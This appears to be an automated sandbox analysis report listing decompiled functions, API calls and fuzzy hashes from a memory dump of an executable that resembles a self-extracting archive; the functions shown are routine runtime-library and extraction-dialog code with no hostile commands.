WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085AC53
_free.LIBCMT ref: 0085AC66
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085AC75

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 3993096759b6d238e0e25de1f3decceaff627f7c63d33adf8181a22ccd0162f9
Instruction ID: a1b12cbe0c133419893c68076c470f85fe2d9b5fc0d2ef814e2583e0c625b16a
Opcode Fuzzy Hash: 3993096759b6d238e0e25de1f3decceaff627f7c63d33adf8181a22ccd0162f9
Instruction Fuzzy Hash: 9D0184726066157F232596BE6CCDC7F7A6DFBC6FA23160269FD04C3201DAA18C0581F2

Uniqueness

Uniqueness Score: -1.00%

Function 008585F5, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E008585F5(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x86d6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00857B91(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00859C04(_t13, _t17, __eflags,  *0x86d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E008583E3(_t13, _t16, 0x890418);
							E00857AC6(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00857AC6();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00859BAE(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x008585f5
0x00858600
0x00858602
0x00858604
0x00858609
0x0085860c
0x0085861a
0x00858626
0x00858629
0x0085862c
0x0085863e
0x00858643
0x00858645
0x00858650
0x00858656
0x0085865e
0x00858660
0x00000000
0x00000000
0x00000000
0x00000000
0x00858647
0x00858647
0x00000000
0x00858647
0x0085862e
0x0085862e
0x0085862f
0x0085862f
0x00858662
0x00858663
0x00858663
0x0085860e
0x00858614
0x00858618
0x0085866b
0x0085866c
0x00858672
0x00000000
0x00000000
0x00000000
0x00858618
0x00858679

APIs

GetLastError.KERNEL32(?,?,?,00857F47,00857BE3,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 008585FA
_free.LIBCMT ref: 0085862F
_free.LIBCMT ref: 00858656
SetLastError.KERNEL32(00000000,?,008700E0), ref: 00858663
SetLastError.KERNEL32(00000000,?,008700E0), ref: 0085866C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 110cb5deddf90bcf75f1228ba4e9393a9c5871331c560729fb62614269c884b4
Instruction ID: 5c7c5025f8b60da7a9c2b6d00dc3de6f36d3b850de07486e0a5fd33614c350c0
Opcode Fuzzy Hash: 110cb5deddf90bcf75f1228ba4e9393a9c5871331c560729fb62614269c884b4
Instruction Fuzzy Hash: B101D136204A00FFD71266296C89D2B2699FBF1377B260126FC56F2252EE608C0D816A

Uniqueness

Uniqueness Score: -1.00%

Function 008403DE, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E008403DE(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E0086146D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E008406B1(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x194)) = 1;
				ReleaseSemaphore( *(__ecx + 0x198), 0x20, 0);
				if( *((intOrPtr*)(_t28 + 0x84)) > 0) {
					_t21 = _t28 + 4;
					do {
						E008404D4(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x84)));
				}
				DeleteCriticalSection(_t28 + 0x1a0);
				CloseHandle( *(_t28 + 0x198));
				_t16 = CloseHandle( *(_t28 + 0x19c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x008403de
0x008403e7
0x008403e9
0x008403ee
0x008403ef
0x008403f9
0x008403fb
0x00840400
0x00840402
0x00840412
0x0084041e
0x00840420
0x00840423
0x00840425
0x0084042c
0x00840432
0x00840433
0x00840436
0x00840423
0x00840445
0x00840451
0x0084045d
0x00840468
0x00840473

APIs

Part of subcall function 008406B1: ResetEvent.KERNEL32(?,?,00840400,?,?,?,?,0086146D,000000FF,?,0083A6B6,?,?,?,0086146D,000000FF), ref: 008406D1
Part of subcall function 008406B1: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,0086146D,000000FF,?,0083A6B6,?,?,?,0086146D,000000FF), ref: 008406E5

ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00840412
CloseHandle.KERNEL32(?,?), ref: 0084042C
DeleteCriticalSection.KERNEL32(?), ref: 00840445
CloseHandle.KERNEL32(?), ref: 00840451
CloseHandle.KERNEL32(?), ref: 0084045D

Part of subcall function 008404D4: WaitForSingleObject.KERNEL32(?,000000FF,008405F3,?,?,00840668,?,?,?,?,?,00840652), ref: 008404DA
Part of subcall function 008404D4: GetLastError.KERNEL32(?,?,00840668,?,?,?,?,?,00840652), ref: 008404E6

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 301db92887fb4310bef85beb320427dffe85b9c0c61bd1e20a0e2cf0d66bcacb
Instruction ID: 37f219c3ee4f4f568dc53875273cc3e49a8586230b95136963827e9fd284e0fe
Opcode Fuzzy Hash: 301db92887fb4310bef85beb320427dffe85b9c0c61bd1e20a0e2cf0d66bcacb
Instruction Fuzzy Hash: 0D019E32100F04EBCB219B68DC48F86BBAAFB45750F014559F2AA82560CBB52844DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0085B4BC, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085B4BC(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x86dd50; // 0x86dd44
					if(_t23 != 0) {
						E00857AC6(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x86dd54; // 0x89088c
					if(_t24 != 0) {
						E00857AC6(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x86dd58; // 0x89088c
					if(_t25 != 0) {
						E00857AC6(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x86dd80; // 0x86dd48
					if(_t26 != 0) {
						E00857AC6(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x86dd84; // 0x890890
					if(_t27 != 0) {
						return E00857AC6(_t6);
					}
				}
				return _t6;
			}

0x0085b4c2
0x0085b4c7
0x0085b4cb
0x0085b4d1
0x0085b4d4
0x0085b4d9
0x0085b4dd
0x0085b4e3
0x0085b4e6
0x0085b4eb
0x0085b4ef
0x0085b4f5
0x0085b4f8
0x0085b4fd
0x0085b501
0x0085b507
0x0085b50a
0x0085b50f
0x0085b510
0x0085b513
0x0085b519
0x00000000
0x0085b521
0x0085b519
0x0085b524

APIs

_free.LIBCMT ref: 0085B4D4

Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE

_free.LIBCMT ref: 0085B4E6
_free.LIBCMT ref: 0085B4F8
_free.LIBCMT ref: 0085B50A
_free.LIBCMT ref: 0085B51C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24267970c9f8a93f180152a5e032a37b77f9f91b33fb886d692ce4487e556b09
Instruction ID: 6437073ea591ae8df98676de5326d66add0f6c42ffe59db03de39f4f587d7da4
Opcode Fuzzy Hash: 24267970c9f8a93f180152a5e032a37b77f9f91b33fb886d692ce4487e556b09
Instruction Fuzzy Hash: 9FF0F632A05310BF8632FF58F886C1AB7DDFB503123599804F808C7612CB30FC848615

Uniqueness

Uniqueness Score: -1.00%

Function 00856C99, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00856C99(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0085A80E(_t52);
					GetModuleFileNameA(0, 0x8902b8, 0x104);
					_t49 =  *0x890868; // 0x5a3310
					 *0x890870 = 0x8902b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x8902b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00856DBD(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00856F32(_v8, _v16, 1);
					if(_t64 != 0) {
						E00856DBD(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0085A329(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x89085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x890860 = _t59;
									L16:
									E00857AC6(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x89085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x890860 = _t43;
						goto L10;
					} else {
						_t44 = E00857F42();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00857AC6(_t64);
						return _t50;
					}
				} else {
					_t45 = E00857F42();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00857E21();
					return _t65;
				}
			}

0x00856c99
0x00856ca6
0x00856cc6
0x00856cd9
0x00856cdf
0x00856ce5
0x00856ced
0x00856cf4
0x00856cf4
0x00856cf9
0x00856d00
0x00856d07
0x00856d19
0x00856d20
0x00856d3f
0x00856d4b
0x00856d66
0x00856d69
0x00856d70
0x00856d76
0x00856d7d
0x00856d80
0x00856d82
0x00856d86
0x00856d90
0x00856d90
0x00856d92
0x00856d98
0x00856d9b
0x00856d9d
0x00856da3
0x00856da4
0x00856daa
0x00000000
0x00000000
0x00000000
0x00000000
0x00856d88
0x00856d88
0x00856d88
0x00856d8b
0x00856d8c
0x00000000
0x00856d88
0x00856d78
0x00000000
0x00856d78
0x00856d51
0x00856d56
0x00856d58
0x00856d5a
0x00000000
0x00856d22
0x00856d22
0x00856d27
0x00856d29
0x00856d2a
0x00856d5f
0x00856d5f
0x00856dad
0x00856dae
0x00000000
0x00856db7
0x00856cae
0x00856cae
0x00856cb5
0x00856cb6
0x00856cb8
0x00000000
0x00856cbd

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\9nZ3r5ZN45.exe,00000104), ref: 00856CD9
_free.LIBCMT ref: 00856DA4
_free.LIBCMT ref: 00856DAE

Strings

C:\Users\user\Desktop\9nZ3r5ZN45.exe, xrefs: 00856CD0, 00856CD7, 00856D06, 00856D3E

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\9nZ3r5ZN45.exe
API String ID: 2506810119-2970394950
Opcode ID: f52678c8036389e2be598897a3a5bdc2c658ba90f82103d3a3918edc1b4423d5
Instruction ID: b460b5abd4ade0603ce363cc153c25a6f054fafd0e9535ba952fa9385a0af000
Opcode Fuzzy Hash: f52678c8036389e2be598897a3a5bdc2c658ba90f82103d3a3918edc1b4423d5
Instruction Fuzzy Hash: CC319A71A04218AFDB21EF999C8199EBBFCFB85311F5480A6FC04E7211E6718E58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008374AC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E008374AC(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t58;
				void* _t59;
				void* _t62;

				_t58 = __esi;
				_t42 = __ebx;
				E0084D8C4(E008613A5, __ecx);
				E0084D9C0();
				 *((intOrPtr*)(_t62 - 0x20)) = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) = 0;
				 *((intOrPtr*)(_t62 - 0x18)) = 0;
				 *((intOrPtr*)(_t62 - 0x14)) = 0;
				 *((char*)(_t62 - 0x10)) = 0;
				_t55 =  *((intOrPtr*)(_t62 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_push(_t62 - 0x20);
				if(E00833AAF( *((intOrPtr*)(_t62 + 8)), __edx) != 0) {
					if( *0x870042 == 0) {
						if(E00837B08(L"SeSecurityPrivilege") != 0) {
							 *0x870041 = 1;
						}
						E00837B08(L"SeRestorePrivilege");
						 *0x870042 = 1;
					}
					_push(_t58);
					_t59 = 7;
					if( *0x870041 != 0) {
						_t59 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t62 - 0x20));
					_push(_t43);
					_push(_t59);
					_push( *((intOrPtr*)(_t62 + 0xc)));
					if( *0x86de80() == 0) {
						if(E0083B3C9( *((intOrPtr*)(_t62 + 0xc)), _t62 - 0x106c, 0x800) == 0) {
							L10:
							E00831F29(_t71, 0x52, _t55 + 0x1e,  *((intOrPtr*)(_t62 + 0xc)));
							_t32 = GetLastError();
							E0084E76A(_t32);
							if(_t32 == 5 && E0083FCB1() == 0) {
								E00831558(_t62 - 0x6c, 0x18);
								E00840AC7(_t62 - 0x6c);
							}
							E00836F18(0x8700e0, 1);
						} else {
							_t39 =  *0x86de80(_t62 - 0x106c, _t59, _t43);
							_t71 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E0083158D(_t62 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t26;
			}

0x008374ac
0x008374ac
0x008374b1
0x008374bb
0x008374c3
0x008374c6
0x008374c9
0x008374cc
0x008374cf
0x008374d2
0x008374d7
0x008374d8
0x008374d9
0x008374df
0x008374e7
0x008374f4
0x00837502
0x00837504
0x00837504
0x00837510
0x00837515
0x00837515
0x00837523
0x00837526
0x00837527
0x0083752b
0x0083752b
0x0083752c
0x0083752d
0x00837530
0x00837531
0x00837532
0x0083753d
0x00837555
0x0083756a
0x00837573
0x00837578
0x00837587
0x0083758f
0x0083759f
0x008375a7
0x008375a7
0x008375b0
0x00837557
0x00837560
0x00837566
0x00837568
0x00000000
0x00000000
0x00837568
0x00837555
0x008375b6
0x008375ba
0x008375c3
0x008375cd

APIs

__EH_prolog.LIBCMT ref: 008374B1

Part of subcall function 00833AAF: __EH_prolog.LIBCMT ref: 00833AB4

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00837578

Part of subcall function 00837B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837B17
Part of subcall function 00837B08: GetLastError.KERNEL32 ref: 00837B5D
Part of subcall function 00837B08: CloseHandle.KERNEL32(?), ref: 00837B6C

Strings

SeRestorePrivilege, xrefs: 0083750B
SeSecurityPrivilege, xrefs: 008374F6

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 551e7f33454f8d798714bfea23c608f2d94f615be23a995bcf092ae29c579f72
Instruction ID: 9166c7fb3a7cabee53ed00afb4051038c4c64e480d7840b6c69db2faeb4d52d8
Opcode Fuzzy Hash: 551e7f33454f8d798714bfea23c608f2d94f615be23a995bcf092ae29c579f72
Instruction Fuzzy Hash: 9A31B5B1A04208AADF20EF68DC45BEE7BB8FF95314F004055F549EB242DB758A44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00849C00, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00849C00(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t26;
				void* _t27;
				struct HWND__* _t29;
				signed short _t30;

				_t24 = _a16;
				_t30 = _a12;
				_t29 = _a4;
				_t26 = _a8;
				if(E008312D7(__edx, _t29, _t26, _t30, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t27 = _t26 - 0x110;
				if(_t27 == 0) {
					_push( *_t24);
					 *0x88fe38 = _t24;
					L13:
					SetDlgItemTextW(_t29, 0x66, ??);
					goto L14;
				}
				if(_t27 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t30 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t29, 0x66,  *( *0x88fe38), ( *0x88fe38)[1]);
					_push(1);
					L10:
					EndDialog(_t29, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E0083B9E0(__eflags,  *( *0x88fe38)));
					_push( *( *0x88fe38));
					_push(E0083DA8B(0x8e));
					_t22 = E008310B0(_t29);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x88fe38));
					goto L13;
				}
				goto L6;
			}

0x00849c01
0x00849c06
0x00849c0b
0x00849c10
0x00849c28
0x00849cb8
0x00849cba
0x00000000
0x00849cba
0x00849c2e
0x00849c34
0x00849ca7
0x00849ca9
0x00849caf
0x00849cb2
0x00000000
0x00849cb2
0x00849c39
0x00849c4d
0x00000000
0x00849c4d
0x00849c3e
0x00849c41
0x00849c9d
0x00849ca3
0x00849c87
0x00849c88
0x00000000
0x00849c88
0x00849c43
0x00849c46
0x00849c85
0x00000000
0x00849c85
0x00849c4b
0x00849c56
0x00849c5f
0x00849c65
0x00849c71
0x00849c73
0x00849c78
0x00849c7a
0x00000000
0x00000000
0x00849c81
0x00000000
0x00849c81
0x00000000

APIs

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

EndDialog.USER32(?,00000001), ref: 00849C88
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00849C9D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00849CB2

Strings

ASKNEXTVOL, xrefs: 00849C18

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: da30267a8d6dbb9419e0ddfb8194412ce477d87b057c05d3b4f6377723b6473a
Instruction ID: e173740ff9445e3b54ae4d602e5906e8826db7257b3e9842553d65301dd44072
Opcode Fuzzy Hash: da30267a8d6dbb9419e0ddfb8194412ce477d87b057c05d3b4f6377723b6473a
Instruction Fuzzy Hash: 67119633640219BFD6219F68ED89F673BE9FB87704F150010F381DB1B1C7A19A119761

Uniqueness

Uniqueness Score: -1.00%

Function 0084A123, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0084A123(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E008312D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0083E942(_t24, 0x885c00,  &_v260);
					E0083E98D( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0084a12d
0x0084a131
0x0084a135
0x0084a14e
0x0084a1bd
0x00000000
0x0084a1bf
0x0084a150
0x0084a156
0x0084a1b7
0x00000000
0x0084a1b7
0x0084a15b
0x0084a16a
0x00000000
0x0084a16a
0x0084a160
0x0084a163
0x0084a189
0x0084a19b
0x0084a1a8
0x0084a1ad
0x0084a170
0x0084a171
0x00000000
0x0084a171
0x0084a168
0x0084a16e
0x00000000
0x0084a16e
0x00000000

APIs

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

EndDialog.USER32(?,00000001), ref: 0084A171
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0084A189
SetDlgItemTextW.USER32(?,00000067,?), ref: 0084A1B7

Strings

GETPASSWORD1, xrefs: 0084A13C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 60e628dc2c740560091e2b6f847f412b1c0c8e785226f8325d621374c617b7f3
Instruction ID: 140c5816d72266807795db1d9aedff11539d2d44ffe800774b55020ea05cbcd1
Opcode Fuzzy Hash: 60e628dc2c740560091e2b6f847f412b1c0c8e785226f8325d621374c617b7f3
Instruction Fuzzy Hash: B811D632A8021CB7DB259E689D49FFB7B7CFB49710F010011FA46FA1C0C6A5AD5597A2

Uniqueness

Uniqueness Score: -1.00%

Function 0083B254, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0083B254(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0083B563(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00850BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00850BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00852B93(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00854E1F(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00833F53(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0083b255
0x0083b25c
0x0083b261
0x0083b264
0x0083b26b
0x0083b288
0x0083b28c
0x0083b297
0x0083b298
0x0083b299
0x0083b29f
0x0083b2a2
0x0083b2a7
0x0083b2a8
0x0083b2a9
0x0083b2b2
0x0083b2bc
0x0083b2b4
0x0083b2b8
0x0083b2b8
0x0083b2c6
0x0083b2c8
0x0083b2cd
0x0083b2d5
0x0083b2d7
0x0083b2d7
0x0083b2a2
0x00000000
0x0083b2db
0x00000000

APIs

_swprintf.LIBCMT ref: 0083B27B

